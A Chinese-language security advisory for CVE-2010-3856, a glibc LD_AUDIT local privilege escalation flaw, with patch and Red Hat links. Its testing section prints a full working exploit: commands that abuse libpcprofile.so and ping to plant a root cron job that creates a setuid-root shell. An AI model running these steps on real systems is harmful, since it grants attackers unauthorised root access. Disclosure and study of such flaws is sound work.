AUDIT本地权限提升漏洞

发布日期：2010-10-22
更新日期：2010-10-27

受影响系统：
GNU glibc 2.x
描述：
--------------------------------------------------------------------------------
BUGTRAQ  ID: 44347
CVE ID: CVE-2010-3856

glibc是绝大多数Linux操作系统中C库的实现。

在执行特权程序期间glibc动态连接器/加载器加载DSO以对其审计API提供回调时没有执行充分的安全性检查。本地攻击者可以利用这个漏洞通过包含有不安全构建程序的特制系统DSO库提升权限。

<*来源：Tavis Ormandy （taviso@gentoo.org）
 
  链接：
        ?l=bugtraq&m=128801542820572&w=2
        https://www.redhat.com/support/errata/RHSA-2010-0793.html
*>

测试方法：
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

# The creation mask is inherited by children, and survives even a setuid
# execve. Therefore, we can influence how files are created during
# exploitation.
$ umask 0

# libpcprofile is distributed with the libc package.
$ dpkg -S /lib/libpcprofile.so
libc6: /lib/libpcprofile.so
$ ls -l /lib/libpcprofile.so
-rw-r--r-- 1 root root 5496 2010-10-12 03:32 /lib/libpcprofile.so

# We identified one of the pcprofile constructors is unsafe to run with
# elevated privileges, as it creates the file specified in the output
# environment variable.
$ LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/etc/cron.d/exploit" ping
ERROR: ld.so: object 'libpcprofile.so' cannot be loaded as audit interface: undefined \
                symbol: la_version; ignored.
Usage: ping [-LRUbdfnqrvVaA] [-c count] [-i interval] [-w deadline]
            [-p pattern] [-s packetsize] [-t ttl] [-I interface or address]
            [-M mtu discovery hint] [-S sndbuf]
            [ -T timestamp option ] [ -Q tos ] [hop1 ...] destination

# This results in creating a world writable file in the crontab directory.
$ ls -l /etc/cron.d/exploit
-rw-rw-rw- 1 root taviso 65 2010-10-21 14:22 /etc/cron.d/exploit

# Setup a cronjob to give us privileges (of course, there are dozens of other
# ways this could be exploited).
$ printf "* * * * * root cp /bin/dash /tmp/exploit; chmod u+s /tmp/exploit\n" > \
/etc/cron.d/exploit

# Wait a few minutes...
$ ls -l /tmp/exploit
ls: cannot access /tmp/exploit: No such file or directory
$ ls -l /tmp/exploit
ls: cannot access /tmp/exploit: No such file or directory
$ ls -l /tmp/exploit
-rwsr-xr-x 1 root root 83888 2010-10-21 14:25 /tmp/exploit

# A setuid root shell appears.
$ /tmp/exploit
# whoami
root

建议：
--------------------------------------------------------------------------------
厂商补丁：

GNU
---
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

?p=glibc.git;a=commit;h=8e9f92e9d5d7737afdacf79b76d98c4c42980508

RedHat
------
RedHat已经为此发布了一个安全公告（RHSA-2010:0793-01）以及相应补丁:
RHSA-2010:0793-01：Important: glibc security update
链接：https://www.redhat.com/support/errata/RHSA-2010-0793.html